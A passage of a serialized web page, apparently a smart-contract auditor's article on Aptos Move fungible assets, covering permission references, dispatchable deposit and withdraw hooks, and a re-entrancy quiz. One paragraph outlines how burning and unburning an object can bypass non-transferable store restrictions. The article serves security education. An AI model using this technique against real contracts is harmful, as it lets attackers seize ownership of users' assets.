,"props":64798,"children":64799},{"style":272},[64800],{"type":33,"value":64445},{"type":28,"tag":116,"props":64802,"children":64803},{"style":370},[64804],{"type":33,"value":141},{"type":28,"tag":116,"props":64806,"children":64807},{"style":266},[64808],{"type":33,"value":64719},{"type":28,"tag":116,"props":64810,"children":64811},{"style":370},[64812],{"type":33,"value":373},{"type":28,"tag":116,"props":64814,"children":64815},{"style":272},[64816],{"type":33,"value":64817}," to",{"type":28,"tag":116,"props":64819,"children":64820},{"style":266},[64821],{"type":33,"value":384},{"type":28,"tag":116,"props":64823,"children":64824},{"class":245,"line":779},[64825],{"type":28,"tag":116,"props":64826,"children":64827},{"style":266},[64828],{"type":33,"value":406},{"type":28,"tag":29,"props":64830,"children":64831},{},[64832,64834,64839,64841,64846],{"type":33,"value":64833},"A user could exploit this by creating an object and a transfer permission, burning the object (changing its ownership to the ",{"type":28,"tag":98,"props":64835,"children":64837},{"className":64836},[],[64838],{"type":33,"value":63491},{"type":33,"value":64840},"), transferring it to another user, and then registering a non-transferable fungible store with that object. While the store could no longer be moved using the owner's ",{"type":28,"tag":98,"props":64842,"children":64844},{"className":64843},[],[64845],{"type":33,"value":6818},{"type":33,"value":64847}," or the transfer permission due to non-transferable restrictions, it could be unburned to restore the original ownership!",{"type":28,"tag":75,"props":64849,"children":64851},{"id":64850},"references",[64852],{"type":33,"value":64853},"References",{"type":28,"tag":29,"props":64855,"children":64856},{},[64857,64862,64864,64870,64872,64877,64879,64884],{"type":28,"tag":98,"props":64858,"children":64860},{"className":64859},[],[64861],{"type":33,"value":64853},{"type":33,"value":64863}," are a permission type resource that authenticate a caller for security-critical operations. ",{"type":28,"tag":98,"props":64865,"children":64867},{"className":64866},[],[64868],{"type":33,"value":64869},"Refs",{"type":33,"value":64871}," are based on the ",{"type":28,"tag":98,"props":64873,"children":64875},{"className":64874},[],[64876],{"type":33,"value":48472},{"type":33,"value":64878}," model, but they are also adapted by fungible assets. Some of these are defined by the ",{"type":28,"tag":98,"props":64880,"children":64882},{"className":64881},[],[64883],{"type":33,"value":48472},{"type":33,"value":64885}," itself, while others are created through the fungible asset module. What's more, some are shared between them, while others appear shared but aren’t.",{"type":28,"tag":29,"props":64887,"children":64888},{},[64889,64891,64896,64898,64903,64904,64910,64912,64917,64919,64924],{"type":33,"value":64890},"Let's get back to the ",{"type":28,"tag":98,"props":64892,"children":64894},{"className":64893},[],[64895],{"type":33,"value":61695},{"type":33,"value":64897}," deletion example. Both ",{"type":28,"tag":98,"props":64899,"children":64901},{"className":64900},[],[64902],{"type":33,"value":62980},{"type":33,"value":10659},{"type":28,"tag":98,"props":64905,"children":64907},{"className":64906},[],[64908],{"type":33,"value":64909},"fungible_asset::remove_store",{"type":33,"value":64911}," use the same object-specific ",{"type":28,"tag":98,"props":64913,"children":64915},{"className":64914},[],[64916],{"type":33,"value":62912},{"type":33,"value":64918}," permission. It can be created only during object creation. There is no separate ",{"type":28,"tag":98,"props":64920,"children":64922},{"className":64921},[],[64923],{"type":33,"value":62912},{"type":33,"value":64925}," for fungible assets.",{"type":28,"tag":234,"props":64927,"children":64928},{"className":2652,"code":62862,"language":2651,"meta":7,"style":7},[64929],{"type":28,"tag":98,"props":64930,"children":64931},{"__ignoreMap":7},[64932,64939,64978,64985,64992],{"type":28,"tag":116,"props":64933,"children":64934},{"class":245,"line":246},[64935],{"type":28,"tag":116,"props":64936,"children":64937},{"style":250},[64938],{"type":33,"value":62874},{"type":28,"tag":116,"props":64940,"children":64941},{"class":245,"line":256},[64942,64946,64950,64954,64958,64962,64966,64970,64974],{"type":28,"tag":116,"props":64943,"children":64944},{"style":272},[64945],{"type":33,"value":61294},{"type":28,"tag":116,"props":64947,"children":64948},{"style":272},[64949],{"type":33,"value":5878},{"type":28,"tag":116,"props":64951,"children":64952},{"style":282},[64953],{"type":33,"value":62890},{"type":28,"tag":116,"props":64955,"children":64956},{"style":266},[64957],{"type":33,"value":313},{"type":28,"tag":116,"props":64959,"children":64960},{"style":272},[64961],{"type":33,"value":62899},{"type":28,"tag":116,"props":64963,"children":64964},{"style":370},[64965],{"type":33,"value":4160},{"type":28,"tag":116,"props":64967,"children":64968},{"style":370},[64969],{"type":33,"value":6813},{"type":28,"tag":116,"props":64971,"children":64972},{"style":339},[64973],{"type":33,"value":62912},{"type":28,"tag":116,"props":64975,"children":64976},{"style":266},[64977],{"type":33,"value":2830},{"type":28,"tag":116,"props":64979,"children":64980},{"class":245,"line":293},[64981],{"type":28,"tag":116,"props":64982,"children":64983},{"emptyLinePlaceholder":19},[64984],{"type":33,"value":1044},{"type":28,"tag":116,"props":64986,"children":64987},{"class":245,"line":361},[64988],{"type":28,"tag":116,"props":64989,"children":64990},{"style":250},[64991],{"type":33,"value":62931},{"type":28,"tag":116,"props":64993,"children":64994},{"class":245,"line":387},[64995,64999,65003,65007,65011,65015,65019,65023],{"type":28,"tag":116,"props":64996,"children":64997},{"style":272},[64998],{"type":33,"value":61294},{"type":28,"tag":116,"props":65000,"children":65001},{"style":272},[65002],{"type":33,"value":5878},{"type":28,"tag":116,"props":65004,"children":65005},{"style":282},[65006],{"type":33,"value":62947},{"type":28,"tag":116,"props":65008,"children":65009},{"style":266},[65010],{"type":33,"value":313},{"type":28,"tag":116,"props":65012,"children":65013},{"style":376},[65014],{"type":33,"value":62956},{"type":28,"tag":116,"props":65016,"children":65017},{"style":370},[65018],{"type":33,"value":4160},{"type":28,"tag":116,"props":65020,"children":65021},{"style":339},[65022],{"type":33,"value":62965},{"type":28,"tag":116,"props":65024,"children":65025},{"style":266},[65026],{"type":33,"value":2830},{"type":28,"tag":29,"props":65028,"children":65029},{},[65030,65032,65037,65039,65045],{"type":33,"value":65031},"On the other hand, the \"frozen\" status of a ",{"type":28,"tag":98,"props":65033,"children":65035},{"className":65034},[],[65036],{"type":33,"value":61695},{"type":33,"value":65038}," is toggled using a ",{"type":28,"tag":98,"props":65040,"children":65042},{"className":65041},[],[65043],{"type":33,"value":65044},"TransferRef",{"type":33,"value":65046},", which is defined in both models (and not interchangeable). They also can be created only during object creation.",{"type":28,"tag":234,"props":65048,"children":65050},{"className":2652,"code":65049,"language":2651,"meta":7,"style":7},"public fun set_frozen_flag\u003CT: key>(\n    ref: &TransferRef,\n    store: Object\u003CT>,\n    frozen: bool,\n)\n",[65051],{"type":28,"tag":98,"props":65052,"children":65053},{"__ignoreMap":7},[65054,65090,65114,65141,65160],{"type":28,"tag":116,"props":65055,"children":65056},{"class":245,"line":246},[65057,65061,65065,65070,65074,65078,65082,65086],{"type":28,"tag":116,"props":65058,"children":65059},{"style":272},[65060],{"type":33,"value":61294},{"type":28,"tag":116,"props":65062,"children":65063},{"style":272},[65064],{"type":33,"value":5878},{"type":28,"tag":116,"props":65066,"children":65067},{"style":272},[65068],{"type":33,"value":65069}," set_frozen_flag",{"type":28,"tag":116,"props":65071,"children":65072},{"style":266},[65073],{"type":33,"value":514},{"type":28,"tag":116,"props":65075,"children":65076},{"style":339},[65077],{"type":33,"value":5659},{"type":28,"tag":116,"props":65079,"children":65080},{"style":370},[65081],{"type":33,"value":4160},{"type":28,"tag":116,"props":65083,"children":65084},{"style":272},[65085],{"type":33,"value":5603},{"type":28,"tag":116,"props":65087,"children":65088},{"style":266},[65089],{"type":33,"value":6260},{"type":28,"tag":116,"props":65091,"children":65092},{"class":245,"line":256},[65093,65098,65102,65106,65110],{"type":28,"tag":116,"props":65094,"children":65095},{"style":376},[65096],{"type":33,"value":65097},"    ref",{"type":28,"tag":116,"props":65099,"children":65100},{"style":370},[65101],{"type":33,"value":4160},{"type":28,"tag":116,"props":65103,"children":65104},{"style":370},[65105],{"type":33,"value":6813},{"type":28,"tag":116,"props":65107,"children":65108},{"style":339},[65109],{"type":33,"value":65044},{"type":28,"tag":116,"props":65111,"children":65112},{"style":266},[65113],{"type":33,"value":3178},{"type":28,"tag":116,"props":65115,"children":65116},{"class":245,"line":293},[65117,65121,65125,65129,65133,65137],{"type":28,"tag":116,"props":65118,"children":65119},{"style":272},[65120],{"type":33,"value":29069},{"type":28,"tag":116,"props":65122,"children":65123},{"style":370},[65124],{"type":33,"value":4160},{"type":28,"tag":116,"props":65126,"children":65127},{"style":339},[65128],{"type":33,"value":61180},{"type":28,"tag":116,"props":65130,"children":65131},{"style":266},[65132],{"type":33,"value":514},{"type":28,"tag":116,"props":65134,"children":65135},{"style":339},[65136],{"type":33,"value":5659},{"type":28,"tag":116,"props":65138,"children":65139},{"style":266},[65140],{"type":33,"value":5809},{"type":28,"tag":116,"props":65142,"children":65143},{"class":245,"line":361},[65144,65148,65152,65156],{"type":28,"tag":116,"props":65145,"children":65146},{"style":272},[65147],{"type":33,"value":60832},{"type":28,"tag":116,"props":65149,"children":65150},{"style":370},[65151],{"type":33,"value":4160},{"type":28,"tag":116,"props":65153,"children":65154},{"style":339},[65155],{"type":33,"value":11718},{"type":28,"tag":116,"props":65157,"children":65158},{"style":266},[65159],{"type":33,"value":3178},{"type":28,"tag":116,"props":65161,"children":65162},{"class":245,"line":387},[65163],{"type":28,"tag":116,"props":65164,"children":65165},{"style":266},[65166],{"type":33,"value":2830},{"type":28,"tag":29,"props":65168,"children":65169},{},[65170,65171,65176,65177,65182],{"type":33,"value":16275},{"type":28,"tag":98,"props":65172,"children":65174},{"className":65173},[],[65175],{"type":33,"value":48472},{"type":33,"value":6129},{"type":28,"tag":98,"props":65178,"children":65180},{"className":65179},[],[65181],{"type":33,"value":65044},{"type":33,"value":65183}," is used to transfer object ownership:",{"type":28,"tag":234,"props":65185,"children":65187},{"className":2652,"code":65186,"language":2651,"meta":7,"style":7},"/// Used to create LinearTransferRef, hence ownership transfer.\nstruct TransferRef has drop, store {\n    self: address,\n}\n",[65188],{"type":28,"tag":98,"props":65189,"children":65190},{"__ignoreMap":7},[65191,65199,65232,65251],{"type":28,"tag":116,"props":65192,"children":65193},{"class":245,"line":246},[65194],{"type":28,"tag":116,"props":65195,"children":65196},{"style":250},[65197],{"type":33,"value":65198},"/// Used to create LinearTransferRef, hence ownership transfer.\n",{"type":28,"tag":116,"props":65200,"children":65201},{"class":245,"line":256},[65202,65206,65211,65215,65220,65224,65228],{"type":28,"tag":116,"props":65203,"children":65204},{"style":376},[65205],{"type":33,"value":9069},{"type":28,"tag":116,"props":65207,"children":65208},{"style":339},[65209],{"type":33,"value":65210}," TransferRef",{"type":28,"tag":116,"props":65212,"children":65213},{"style":272},[65214],{"type":33,"value":9078},{"type":28,"tag":116,"props":65216,"children":65217},{"style":272},[65218],{"type":33,"value":65219}," drop",{"type":28,"tag":116,"props":65221,"children":65222},{"style":266},[65223],{"type":33,"value":825},{"type":28,"tag":116,"props":65225,"children":65226},{"style":272},[65227],{"type":33,"value":5612},{"type":28,"tag":116,"props":65229,"children":65230},{"style":266},[65231],{"type":33,"value":1291},{"type":28,"tag":116,"props":65233,"children":65234},{"class":245,"line":293},[65235,65239,65243,65247],{"type":28,"tag":116,"props":65236,"children":65237},{"style":376},[65238],{"type":33,"value":20449},{"type":28,"tag":116,"props":65240,"children":65241},{"style":370},[65242],{"type":33,"value":4160},{"type":28,"tag":116,"props":65244,"children":65245},{"style":272},[65246],{"type":33,"value":5921},{"type":28,"tag":116,"props":65248,"children":65249},{"style":266},[65250],{"type":33,"value":3178},{"type":28,"tag":116,"props":65252,"children":65253},{"class":245,"line":361},[65254],{"type":28,"tag":116,"props":65255,"children":65256},{"style":266},[65257],{"type":33,"value":406},{"type":28,"tag":29,"props":65259,"children":65260},{},[65261,65263,65268],{"type":33,"value":65262},"While the fungible asset's ",{"type":28,"tag":98,"props":65264,"children":65266},{"className":65265},[],[65267],{"type":33,"value":65044},{"type":33,"value":65269}," manages the transfer of fungible assets and the (un)freezing of fungible stores:",{"type":28,"tag":234,"props":65271,"children":65273},{"className":2652,"code":65272,"language":2651,"meta":7,"style":7},"/// TransferRef can be used to allow or disallow the owner of fungible assets from transferring the asset\n/// and allow the holder of TransferRef to transfer fungible assets from any account.\nstruct TransferRef has drop, store {\n    metadata: Object\u003CMetadata>\n}\n",[65274],{"type":28,"tag":98,"props":65275,"children":65276},{"__ignoreMap":7},[65277,65285,65293,65324,65351],{"type":28,"tag":116,"props":65278,"children":65279},{"class":245,"line":246},[65280],{"type":28,"tag":116,"props":65281,"children":65282},{"style":250},[65283],{"type":33,"value":65284},"/// TransferRef can be used to allow or disallow the owner of fungible assets from transferring the asset\n",{"type":28,"tag":116,"props":65286,"children":65287},{"class":245,"line":256},[65288],{"type":28,"tag":116,"props":65289,"children":65290},{"style":250},[65291],{"type":33,"value":65292},"/// and allow the holder of TransferRef to transfer fungible assets from any account.\n",{"type":28,"tag":116,"props":65294,"children":65295},{"class":245,"line":293},[65296,65300,65304,65308,65312,65316,65320],{"type":28,"tag":116,"props":65297,"children":65298},{"style":376},[65299],{"type":33,"value":9069},{"type":28,"tag":116,"props":65301,"children":65302},{"style":339},[65303],{"type":33,"value":65210},{"type":28,"tag":116,"props":65305,"children":65306},{"style":272},[65307],{"type":33,"value":9078},{"type":28,"tag":116,"props":65309,"children":65310},{"style":272},[65311],{"type":33,"value":65219},{"type":28,"tag":116,"props":65313,"children":65314},{"style":266},[65315],{"type":33,"value":825},{"type":28,"tag":116,"props":65317,"children":65318},{"style":272},[65319],{"type":33,"value":5612},{"type":28,"tag":116,"props":65321,"children":65322},{"style":266},[65323],{"type":33,"value":1291},{"type":28,"tag":116,"props":65325,"children":65326},{"class":245,"line":361},[65327,65331,65335,65339,65343,65347],{"type":28,"tag":116,"props":65328,"children":65329},{"style":272},[65330],{"type":33,"value":61171},{"type":28,"tag":116,"props":65332,"children":65333},{"style":370},[65334],{"type":33,"value":4160},{"type":28,"tag":116,"props":65336,"children":65337},{"style":339},[65338],{"type":33,"value":61180},{"type":28,"tag":116,"props":65340,"children":65341},{"style":266},[65342],{"type":33,"value":514},{"type":28,"tag":116,"props":65344,"children":65345},{"style":339},[65346],{"type":33,"value":61189},{"type":28,"tag":116,"props":65348,"children":65349},{"style":266},[65350],{"type":33,"value":506},{"type":28,"tag":116,"props":65352,"children":65353},{"class":245,"line":387},[65354],{"type":28,"tag":116,"props":65355,"children":65356},{"style":266},[65357],{"type":33,"value":406},{"type":28,"tag":29,"props":65359,"children":65360},{},[65361,65363,65369,65371,65377],{"type":33,"value":65362},"Additionally, there are fungible asset-specific references such as ",{"type":28,"tag":98,"props":65364,"children":65366},{"className":65365},[],[65367],{"type":33,"value":65368},"MintRef",{"type":33,"value":65370}," for minting and ",{"type":28,"tag":98,"props":65372,"children":65374},{"className":65373},[],[65375],{"type":33,"value":65376},"BurnRef",{"type":33,"value":65378}," for burning. These references are used exclusively by the fungible asset model, but they still must be created when the fungible asset object is initialized.",{"type":28,"tag":63,"props":65380,"children":65382},{"id":65381},"dispatchable-fungible-assets",[65383],{"type":33,"value":65384},"Dispatchable fungible assets",{"type":28,"tag":29,"props":65386,"children":65387},{},[65388],{"type":33,"value":65389},"Dispatchable fungible assets enhance the functionality of fungible assets by enabling the overloading of operations like deposits and withdrawals.",{"type":28,"tag":29,"props":65391,"children":65392},{},[65393],{"type":33,"value":65394},"Hooks registered during the creation of a dispatchable fungible asset override the default logic for these operations, allowing for custom features like access control, fee mechanisms, or granular pausing.",{"type":28,"tag":65396,"props":65397,"children":65398},"warning",{},[65399],{"type":28,"tag":29,"props":65400,"children":65401},{},[65402,65404,65410],{"type":33,"value":65403},"Overloading the core fungible asset functions introduces potential security risks; for example, during a deposit, funds may not end up at the intended address. The dispatchable fungible asset API provides functions like ",{"type":28,"tag":98,"props":65405,"children":65407},{"className":65406},[],[65408],{"type":33,"value":65409},"transfer_assert_minimum_deposit",{"type":33,"value":65411}," that can help mitigate such risks.",{"type":28,"tag":29,"props":65413,"children":65414},{},[65415,65417,65422,65424,65431],{"type":33,"value":65416},"Hook functions for dispatchable fungible assets must have the correct type signature. They must also be declared ",{"type":28,"tag":98,"props":65418,"children":65420},{"className":65419},[],[65421],{"type":33,"value":61294},{"type":33,"value":65423}," to ensure ",{"type":28,"tag":87,"props":65425,"children":65428},{"href":65426,"rel":65427},"https://aptos.dev/en/build/smart-contracts/book/package-upgrades#compatibility-rules",[91],[65429],{"type":33,"value":65430},"their signature remains immutable",{"type":33,"value":65432},". An example implementation might look like this:",{"type":28,"tag":234,"props":65434,"children":65436},{"className":2652,"code":65435,"language":2651,"meta":7,"style":7},"public fun withdraw_hook\u003CT: key>(\n    store: Object\u003CT>,\n    amount: u64,\n    transfer_ref: &TransferRef,\n): FungibleAsset {\n    //check paused, gather fees etc.\n    fungible_asset::withdraw_with_ref(transfer_ref, store, amount)\n}\n\npublic fun deposit_hook\u003CT: key>(\n    store: Object\u003CT>,\n    fa: FungibleAsset,\n    transfer_ref: &TransferRef,\n) {\n    //check paused, gather fees etc.\n    fungible_asset::deposit_with_ref(transfer_ref, store, fa);\n}\n",[65437],{"type":28,"tag":98,"props":65438,"children":65439},{"__ignoreMap":7},[65440,65476,65503,65522,65546,65565,65573,65619,65626,65633,65669,65696,65716,65739,65746,65753,65797],{"type":28,"tag":116,"props":65441,"children":65442},{"class":245,"line":246},[65443,65447,65451,65456,65460,65464,65468,65472],{"type":28,"tag":116,"props":65444,"children":65445},{"style":272},[65446],{"type":33,"value":61294},{"type":28,"tag":116,"props":65448,"children":65449},{"style":272},[65450],{"type":33,"value":5878},{"type":28,"tag":116,"props":65452,"children":65453},{"style":272},[65454],{"type":33,"value":65455}," withdraw_hook",{"type":28,"tag":116,"props":65457,"children":65458},{"style":266},[65459],{"type":33,"value":514},{"type":28,"tag":116,"props":65461,"children":65462},{"style":339},[65463],{"type":33,"value":5659},{"type":28,"tag":116,"props":65465,"children":65466},{"style":370},[65467],{"type":33,"value":4160},{"type":28,"tag":116,"props":65469,"children":65470},{"style":272},[65471],{"type":33,"value":5603},{"type":28,"tag":116,"props":65473,"children":65474},{"style":266},[65475],{"type":33,"value":6260},{"type":28,"tag":116,"props":65477,"children":65478},{"class":245,"line":256},[65479,65483,65487,65491,65495,65499],{"type":28,"tag":116,"props":65480,"children":65481},{"style":272},[65482],{"type":33,"value":29069},{"type":28,"tag":116,"props":65484,"children":65485},{"style":370},[65486],{"type":33,"value":4160},{"type":28,"tag":116,"props":65488,"children":65489},{"style":339},[65490],{"type":33,"value":61180},{"type":28,"tag":116,"props":65492,"children":65493},{"style":266},[65494],{"type":33,"value":514},{"type":28,"tag":116,"props":65496,"children":65497},{"style":339},[65498],{"type":33,"value":5659},{"type":28,"tag":116,"props":65500,"children":65501},{"style":266},[65502],{"type":33,"value":5809},{"type":28,"tag":116,"props":65504,"children":65505},{"class":245,"line":293},[65506,65510,65514,65518],{"type":28,"tag":116,"props":65507,"children":65508},{"style":272},[65509],{"type":33,"value":61201},{"type":28,"tag":116,"props":65511,"children":65512},{"style":370},[65513],{"type":33,"value":4160},{"type":28,"tag":116,"props":65515,"children":65516},{"style":339},[65517],{"type":33,"value":5531},{"type":28,"tag":116,"props":65519,"children":65520},{"style":266},[65521],{"type":33,"value":3178},{"type":28,"tag":116,"props":65523,"children":65524},{"class":245,"line":361},[65525,65530,65534,65538,65542],{"type":28,"tag":116,"props":65526,"children":65527},{"style":272},[65528],{"type":33,"value":65529},"    transfer_ref",{"type":28,"tag":116,"props":65531,"children":65532},{"style":370},[65533],{"type":33,"value":4160},{"type":28,"tag":116,"props":65535,"children":65536},{"style":370},[65537],{"type":33,"value":6813},{"type":28,"tag":116,"props":65539,"children":65540},{"style":339},[65541],{"type":33,"value":65044},{"type":28,"tag":116,"props":65543,"children":65544},{"style":266},[65545],{"type":33,"value":3178},{"type":28,"tag":116,"props":65547,"children":65548},{"class":245,"line":387},[65549,65553,65557,65561],{"type":28,"tag":116,"props":65550,"children":65551},{"style":266},[65552],{"type":33,"value":1829},{"type":28,"tag":116,"props":65554,"children":65555},{"style":370},[65556],{"type":33,"value":4160},{"type":28,"tag":116,"props":65558,"children":65559},{"style":339},[65560],{"type":33,"value":61159},{"type":28,"tag":116,"props":65562,"children":65563},{"style":266},[65564],{"type":33,"value":1291},{"type":28,"tag":116,"props":65566,"children":65567},{"class":245,"line":400},[65568],{"type":28,"tag":116,"props":65569,"children":65570},{"style":250},[65571],{"type":33,"value":65572},"    //check paused, gather fees etc.\n",{"type":28,"tag":116,"props":65574,"children":65575},{"class":245,"line":614},[65576,65581,65585,65590,65594,65599,65603,65607,65611,65615],{"type":28,"tag":116,"props":65577,"children":65578},{"style":266},[65579],{"type":33,"value":65580},"    fungible_asset",{"type":28,"tag":116,"props":65582,"children":65583},{"style":370},[65584],{"type":33,"value":3151},{"type":28,"tag":116,"props":65586,"children":65587},{"style":282},[65588],{"type":33,"value":65589},"withdraw_with_ref",{"type":28,"tag":116,"props":65591,"children":65592},{"style":266},[65593],{"type":33,"value":313},{"type":28,"tag":116,"props":65595,"children":65596},{"style":272},[65597],{"type":33,"value":65598},"transfer_ref",{"type":28,"tag":116,"props":65600,"children":65601},{"style":266},[65602],{"type":33,"value":825},{"type":28,"tag":116,"props":65604,"children":65605},{"style":272},[65606],{"type":33,"value":5612},{"type":28,"tag":116,"props":65608,"children":65609},{"style":266},[65610],{"type":33,"value":825},{"type":28,"tag":116,"props":65612,"children":65613},{"style":272},[65614],{"type":33,"value":19970},{"type":28,"tag":116,"props":65616,"children":65617},{"style":266},[65618],{"type":33,"value":2830},{"type":28,"tag":116,"props":65620,"children":65621},{"class":245,"line":631},[65622],{"type":28,"tag":116,"props":65623,"children":65624},{"style":266},[65625],{"type":33,"value":406},{"type":28,"tag":116,"props":65627,"children":65628},{"class":245,"line":665},[65629],{"type":28,"tag":116,"props":65630,"children":65631},{"emptyLinePlaceholder":19},[65632],{"type":33,"value":1044},{"type":28,"tag":116,"props":65634,"children":65635},{"class":245,"line":713},[65636,65640,65644,65649,65653,65657,65661,65665],{"type":28,"tag":116,"props":65637,"children":65638},{"style":272},[65639],{"type":33,"value":61294},{"type":28,"tag":116,"props":65641,"children":65642},{"style":272},[65643],{"type":33,"value":5878},{"type":28,"tag":116,"props":65645,"children":65646},{"style":272},[65647],{"type":33,"value":65648}," deposit_hook",{"type":28,"tag":116,"props":65650,"children":65651},{"style":266},[65652],{"type":33,"value":514},{"type":28,"tag":116,"props":65654,"children":65655},{"style":339},[65656],{"type":33,"value":5659},{"type":28,"tag":116,"props":65658,"children":65659},{"style":370},[65660],{"type":33,"value":4160},{"type":28,"tag":116,"props":65662,"children":65663},{"style":272},[65664],{"type":33,"value":5603},{"type":28,"tag":116,"props":65666,"children":65667},{"style":266},[65668],{"type":33,"value":6260},{"type":28,"tag":116,"props":65670,"children":65671},{"class":245,"line":750},[65672,65676,65680,65684,65688,65692],{"type":28,"tag":116,"props":65673,"children":65674},{"style":272},[65675],{"type":33,"value":29069},{"type":28,"tag":116,"props":65677,"children":65678},{"style":370},[65679],{"type":33,"value":4160},{"type":28,"tag":116,"props":65681,"children":65682},{"style":339},[65683],{"type":33,"value":61180},{"type":28,"tag":116,"props":65685,"children":65686},{"style":266},[65687],{"type":33,"value":514},{"type":28,"tag":116,"props":65689,"children":65690},{"style":339},[65691],{"type":33,"value":5659},{"type":28,"tag":116,"props":65693,"children":65694},{"style":266},[65695],{"type":33,"value":5809},{"type":28,"tag":116,"props":65697,"children":65698},{"class":245,"line":779},[65699,65704,65708,65712],{"type":28,"tag":116,"props":65700,"children":65701},{"style":272},[65702],{"type":33,"value":65703},"    fa",{"type":28,"tag":116,"props":65705,"children":65706},{"style":370},[65707],{"type":33,"value":4160},{"type":28,"tag":116,"props":65709,"children":65710},{"style":339},[65711],{"type":33,"value":61159},{"type":28,"tag":116,"props":65713,"children":65714},{"style":266},[65715],{"type":33,"value":3178},{"type":28,"tag":116,"props":65717,"children":65718},{"class":245,"line":796},[65719,65723,65727,65731,65735],{"type":28,"tag":116,"props":65720,"children":65721},{"style":272},[65722],{"type":33,"value":65529},{"type":28,"tag":116,"props":65724,"children":65725},{"style":370},[65726],{"type":33,"value":4160},{"type":28,"tag":116,"props":65728,"children":65729},{"style":370},[65730],{"type":33,"value":6813},{"type":28,"tag":116,"props":65732,"children":65733},{"style":339},[65734],{"type":33,"value":65044},{"type":28,"tag":116,"props":65736,"children":65737},{"style":266},[65738],{"type":33,"value":3178},{"type":28,"tag":116,"props":65740,"children":65741},{"class":245,"line":847},[65742],{"type":28,"tag":116,"props":65743,"children":65744},{"style":266},[65745],{"type":33,"value":844},{"type":28,"tag":116,"props":65747,"children":65748},{"class":245,"line":898},[65749],{"type":28,"tag":116,"props":65750,"children":65751},{"style":250},[65752],{"type":33,"value":65572},{"type":28,"tag":116,"props":65754,"children":65755},{"class":245,"line":907},[65756,65760,65764,65769,65773,65777,65781,65785,65789,65793],{"type":28,"tag":116,"props":65757,"children":65758},{"style":266},[65759],{"type":33,"value":65580},{"type":28,"tag":116,"props":65761,"children":65762},{"style":370},[65763],{"type":33,"value":3151},{"type":28,"tag":116,"props":65765,"children":65766},{"style":282},[65767],{"type":33,"value":65768},"deposit_with_ref",{"type":28,"tag":116,"props":65770,"children":65771},{"style":266},[65772],{"type":33,"value":313},{"type":28,"tag":116,"props":65774,"children":65775},{"style":272},[65776],{"type":33,"value":65598},{"type":28,"tag":116,"props":65778,"children":65779},{"style":266},[65780],{"type":33,"value":825},{"type":28,"tag":116,"props":65782,"children":65783},{"style":272},[65784],{"type":33,"value":5612},{"type":28,"tag":116,"props":65786,"children":65787},{"style":266},[65788],{"type":33,"value":825},{"type":28,"tag":116,"props":65790,"children":65791},{"style":272},[65792],{"type":33,"value":61352},{"type":28,"tag":116,"props":65794,"children":65795},{"style":266},[65796],{"type":33,"value":895},{"type":28,"tag":116,"props":65798,"children":65799},{"class":245,"line":981},[65800],{"type":28,"tag":116,"props":65801,"children":65802},{"style":266},[65803],{"type":33,"value":406},{"type":28,"tag":65805,"props":65806,"children":65807},"question",{},[65808,65835],{"type":28,"tag":29,"props":65809,"children":65810},{},[65811,65813,65819,65821,65827,65828,65834],{"type":33,"value":65812},"Why hook functions rely on ",{"type":28,"tag":98,"props":65814,"children":65816},{"className":65815},[],[65817],{"type":33,"value":65818},"*_with_ref",{"type":33,"value":65820}," calls? What would happen if the hook function called ",{"type":28,"tag":98,"props":65822,"children":65824},{"className":65823},[],[65825],{"type":33,"value":65826},"dispatchable_fungible_asset::withdraw",{"type":33,"value":16455},{"type":28,"tag":98,"props":65829,"children":65831},{"className":65830},[],[65832],{"type":33,"value":65833},"fungible_asset::withdraw_with_ref",{"type":33,"value":2825},{"type":28,"tag":65836,"props":65837,"children":65838},"template",{"v-slot:answer-0":7},[65839,65851],{"type":28,"tag":29,"props":65840,"children":65841},{},[65842,65844,65849],{"type":33,"value":65843},"A1: Hook functions rely on ",{"type":28,"tag":98,"props":65845,"children":65847},{"className":65846},[],[65848],{"type":33,"value":65818},{"type":33,"value":65850}," calls because the default fungible asset functions verify if the fungible asset is not dispatchable.",{"type":28,"tag":29,"props":65852,"children":65853},{},[65854,65856,65861],{"type":33,"value":65855},"A2: A ",{"type":28,"tag":98,"props":65857,"children":65859},{"className":65858},[],[65860],{"type":33,"value":65826},{"type":33,"value":65862}," would result in RUNTIME_DISPATCH_ERROR (code 4037) error with error message: \"Re-entrancy detected\".",{"type":28,"tag":29,"props":65864,"children":65865},{},[65866],{"type":33,"value":65867},"In one of our reviews, we encountered a dispatchable fungible asset where the hooked withdrawal set a \"blocked\" flag, which was cleared by the corresponding deposit. This design was used to ensure that each withdrawal was tied to a deposit, effectively preventing simultaneous withdrawals.",{"type":28,"tag":234,"props":65869,"children":65871},{"className":2652,"code":65870,"language":2651,"meta":7,"style":7},"public fun deposit\u003CT: key>(store: Object\u003CT>, fa: FungibleAsset, transfer_ref: &TransferRef) {\n    assert_withdraw_flag(true);\n    [...]\n    set_withdraw_flag(false);\n    fungible_asset::deposit_with_ref(transfer_ref, store, amount);\n    [...]\n    }\n\npublic fun withdraw\u003CT: key>(store: Object\u003CT>, amount: u64, transfer_ref: &TransferRef): FungibleAsset acquires [...] {\n    assert_withdraw_flag(false);\n    [...]\n    set_withdraw_flag(true);\n    fungible_asset::withdraw_with_ref(transfer_ref, store, amount)\n}\n",[65872],{"type":28,"tag":98,"props":65873,"children":65874},{"__ignoreMap":7},[65875,65970,65990,66005,66025,66068,66083,66090,66097,66216,66235,66250,66269,66312],{"type":28,"tag":116,"props":65876,"children":65877},{"class":245,"line":246},[65878,65882,65886,65890,65894,65898,65902,65906,65910,65914,65918,65922,65926,65930,65934,65938,65942,65946,65950,65954,65958,65962,65966],{"type":28,"tag":116,"props":65879,"children":65880},{"style":272},[65881],{"type":33,"value":61294},{"type":28,"tag":116,"props":65883,"children":65884},{"style":272},[65885],{"type":33,"value":5878},{"type":28,"tag":116,"props":65887,"children":65888},{"style":272},[65889],{"type":33,"value":61303},{"type":28,"tag":116,"props":65891,"children":65892},{"style":266},[65893],{"type":33,"value":514},{"type":28,"tag":116,"props":65895,"children":65896},{"style":339},[65897],{"type":33,"value":5659},{"type":28,"tag":116,"props":65899,"children":65900},{"style":370},[65901],{"type":33,"value":4160},{"type":28,"tag":116,"props":65903,"children":65904},{"style":272},[65905],{"type":33,"value":5603},{"type":28,"tag":116,"props":65907,"children":65908},{"style":266},[65909],{"type":33,"value":7282},{"type":28,"tag":116,"props":65911,"children":65912},{"style":272},[65913],{"type":33,"value":5612},{"type":28,"tag":116,"props":65915,"children":65916},{"style":370},[65917],{"type":33,"value":4160},{"type":28,"tag":116,"props":65919,"children":65920},{"style":339},[65921],{"type":33,"value":61180},{"type":28,"tag":116,"props":65923,"children":65924},{"style":266},[65925],{"type":33,"value":514},{"type":28,"tag":116,"props":65927,"children":65928},{"style":339},[65929],{"type":33,"value":5659},{"typ